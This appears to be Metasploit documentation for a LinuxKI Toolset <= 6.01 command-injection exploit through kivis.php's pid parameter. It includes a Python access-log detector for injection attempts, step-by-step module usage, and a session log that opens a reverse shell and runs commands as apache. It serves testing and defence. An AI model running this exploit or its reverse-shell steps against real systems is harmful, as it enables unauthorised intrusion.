metasploit-gs/documentation/modules/exploit/linux/http/linuxki_rce.md
2020-05-29 18:20:46 +03:00

Description

This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The pid parameter of kivis.php is taken from the request and passed to the shell_exec function without validation, resulting in an OS command injection vulnerability.
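Because the injection point is a single GET parameter that should only ever hold a process id, exploitation attempts are easy to spot in the web server's access log: any request to kivis.php whose pid value is not a plain integer is suspect. The detector below is an added example written for this page, not part of the Metasploit module or of LinuxKI; it assumes an Apache/nginx combined log format, and the /linuxki/ path prefix and the sample log lines are constructed for the example (the real prefix depends on TARGETURI).

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A legitimate pid is digits only; anything else reached shell_exec unescaped in <= 6.01.
PID_OK = re.compile(r"\d+")


def check_request_line(line: str) -> Optional[dict]:
    """Return a finding for a kivis.php request whose pid is not a plain integer, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a recognisable access-log line
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/kivis.php"):
        return None  # only the vulnerable script is of interest
    # parse_qs percent-decodes values, so "%3B" becomes ";" before the check.
    for pid in parse_qs(parts.query, keep_blank_values=True).get("pid", []):
        if not PID_OK.fullmatch(pid):
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "pid": pid,
                "reason": "non-numeric pid sent to kivis.php",
            }
    return None


def scan_log(lines) -> list:
    """Run the check over every line and collect the findings."""
    findings = []
    for line in lines:
        finding = check_request_line(line)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log: one normal request, one injection attempt, two unrelated requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/May/2020:08:32:30 +0300] "GET /linuxki/kivis.php?pid=1234 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [19/May/2020:08:32:32 +0300] "GET /linuxki/kivis.php?pid=1%3Bid HTTP/1.1" 200 87',
    '10.0.0.9 - - [19/May/2020:08:33:01 +0300] "GET /linuxki/index.php HTTP/1.1" 200 3000',
    '10.0.0.5 - - [19/May/2020:08:33:10 +0300] "POST /linuxki/kivis.php HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} pid={f['pid']!r}: {f['reason']}")
```

The check is deliberately an allow-list (digits only) rather than a block-list of shell metacharacters, so encodings or operators the rule author did not think of are still caught. A POST request that carries pid in the body will not appear in the access log at all, so log-based detection only covers the GET form; a WAF rule or the same integer check applied inside kivis.php before shell_exec is the durable fix.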

Vulnerable Application

LinuxKI Toolset <= 6.01

To test this application, you need to download version 6.01 here. Do not forget to replace the download URL inside the Dockerfile with this one.

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/linuxki_rce
  3. set RHOST <target_ip>
  4. set RPORT <target_port>
  5. set LHOST <your_ip>
  6. set LPORT <your_port>
  7. Ideally run check
  8. set LHOST <your_ip>
  9. set LPORT <your_port>
  10. Optional: set TARGETURI <path_to_linuxki> if target system uses a different path to LinuxKI
  11. exploit

Scenarios

LinuxKI Toolset v6.01

msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300

id
uid=48(apache) gid=48(apache) groups=48(apache)